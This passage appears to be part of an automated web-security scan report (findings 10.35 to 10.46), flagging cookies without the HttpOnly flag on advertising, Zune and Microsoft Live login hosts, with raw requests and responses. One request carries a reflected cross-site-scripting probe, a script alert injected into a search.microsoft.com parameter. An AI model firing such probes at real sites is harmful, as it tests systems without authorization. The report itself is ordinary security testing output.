Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323; domain=.interclick.com; expires=Tue, 06-Jul-2021 15:39:03 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Wed, 06 Jul 2011 15:39:02 GMT

GIF89a.............!.......,...........D..;

10.35. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K08784 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=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; rtc_Vpu9=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; rsiPus_TE1N="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:00:43 GMT; Path=/
Last-Modified: Wed, 06 Jul 2011 14:00:43 GMT
Cache-Control: max-age=3600, private
Expires: Wed, 06 Jul 2011 15:00:43 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:00:43 GMT
Content-Length: 5681

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

10.36. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=msftie9drcpc_cs=1&betq=12682=433083 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; BASE=x7Q9ni23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHhGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOID7s5rzN9mUM7Zk/KlL!; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; F1=BQ+HN4EBAAAABAAAAUAAqBA; ROLL=U6APDjegFREW39A!; C2=swDFOFJwCob0FNysICwJoakBtKvAC0nhXLpwIg02FAHCdbdBwhwihXAcIwjmGAHCsGeBwhAQvaAcIQW4FAHCLppBwhAmhXAcIAY4FAHCdDmBwhAmoZAcIwtlGAHCEHoBwhwoyaAcIU1aGAHCBHoBwhgdeZAcIYZgGAHC1mpBwhgHXaAcI0soGAHCX8rBwhAG/aAcIYxvGAHCKopBwhQ2kXAcIUEoGAHCVGoBwhgh3ZAcRGQYmjohS0I9GsfzFU9shNwjkak1k6hA1WjBpD7gCw8jGp+tSLAr8ao60mvAz8qhr7qHGwyfGahh3iyKgW8q; GUID=MTMwOTk0ODk3MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 15:39:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=XGIFOFJwCob0FSRsKiwubaActKvAC0nxILpwIg02FFGCdbdRhhwihXUYIwjmGFGCsGeRhhAQvaUYIQW4FFGCLppRhhAmhXUYIAY4FFGCdDmRhhAmoZUYIwtlGFGCEHoRhhwoyaUYIU1aGFGCBHoRhhgdeZUYIYZgGFGC1mpRhhgHXaUYI0soGFGCX8rRhhAG/aUYIYxvGFGCKopRhhQ2kXUYIUEoGFGCVGoRhhgh3ZUYRGQYmjoxD0I9GsfzFZ8shNwjka4xk6hA1WjRaD7gCw8jGu9tSLAr8a820mvAz8qxc7qHGwyfGfgh3iyKgWQn; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
Set-Cookie: GUID=MTMwOTk2Njc0MzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Wed, 06 Jul 2011 16:39:03 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.37. https://live.zune.net/xweb/passport/bottomCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/bottomCB.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/bottomCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7554
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:03 GMT
Connection: close
Content-Length: 4813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

10.38. https://live.zune.net/xweb/passport/rightCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/rightCB.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/rightCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: b2db948c-3538-4620-8179-ed9314b7b5a4,734190
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: z_dto_minfo=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: supportedTuner=Undefined; path=/
Set-Cookie: z_email=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/
lx-svr: S804
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:01 GMT
Connection: close
Content-Length: 5984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

10.39. https://live.zune.net/xweb/passport/topCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/topCB.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/topCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7548
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:57 GMT
Connection: close
Content-Length: 4616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

10.40. https://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950910&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1 HTTP/1.1
Host: login.live.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14263
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:15:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309950978&id=73625&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-55d45d8a-4113-45e0-90d0-585f12970906; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E59 V: 0
Date: Wed, 06 Jul 2011 11:16:17 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E59 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

10.41. https://login.live.com/pp1100/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp1100/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pp1100/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12506
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-173062aa-9edd-4769-b216-ebf691c92719; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E41 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E41 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

10.42. https://login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12542
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-f4d8415d-863c-470b-9c48-033be61fa412; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E54 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E54 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

10.43. https://login.live.com/ppsecure/secure.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/secure.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12531
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-2f030afb-c784-4e3b-9dbe-a3f70a5aa8ef; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E32 V: 0
Date: Wed, 06 Jul 2011 11:21:03 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E32 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

10.44. https://login.live.com/resetpw.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /resetpw.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&id=75046&vv=1100&mkt=EN-US&lc=1033&bk=1309951135 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2145
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 14:07:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3ccd6cb3-2eff-4d36-a83a-da7d7f8300dc; path=/;version=1
Set-Cookie: MSPBack=1309951135; domain=login.live.com;path=/;version=1
PPServer: PPV: 30 H: BAYIDSLGN1O48 V: 0
Date: Wed, 06 Jul 2011 14:08:45 GMT
Connection: close

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...

10.45. http://m.webtrends.com/dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif?&dcsdat=1309951358760&dcssip=search.microsoft.com&dcsuri=/Preference.aspx&dcsqry=%3Fbd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1%26mkt=en-US&dcsref=http://burp/show/0&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Microsoft%20Search%20Preferences%20Page&WT.js=Yes&WT.jv=1.5&WT.bs=1057x822&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.dcsvid=GUID=b99db294605ea749842ddaca50c2f3af%26HASH=94b2%26LV=20115%26V=3&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1309950916&WT.vt_sid=173.193.214.243-3661456592.30151123.1309950893261&wtDrillDir=/&wtEvtSrc=search.microsoft.com/Preference.aspx HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1&mkt=en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAPAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROCAAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 11:22:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAQAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAH5FFE5+RRROCQAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAAB+RRROfkUUTgAAAAA-; path=/; expires=Sat, 03-Jul-2021 11:22:38 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.46. http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif?&dcsdat=1309953631760&dcssip=www.microsoft.com&dcsuri=/library/toolbar/3.0/trademarks/&dcsref=http://burp/show/10&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=We%20are%20sorry,%20the%20page%20you%20requested%20cannot%20be%20found.&WT.js=Yes&WT.jv=1.5&WT.bs=1057x822&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.dcsvid=GUID=b99db294605ea749842ddaca50c2f3af%26HASH=94b2%26LV=20115%26V=3&WT.wtsv=1&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1309953629&WT.vt_sid=173.193.214.243-3661456592.30151123.1309953629803&wtDrillDir=/library/;/library/toolbar/;/library/toolbar/3.0/;/library/toolbar/3.0/trademarks/&wtEvtSrc=www.microsoft.com/library/toolbar/3.0/trademarks/ HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/library/toolbar/3.0/trademarks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
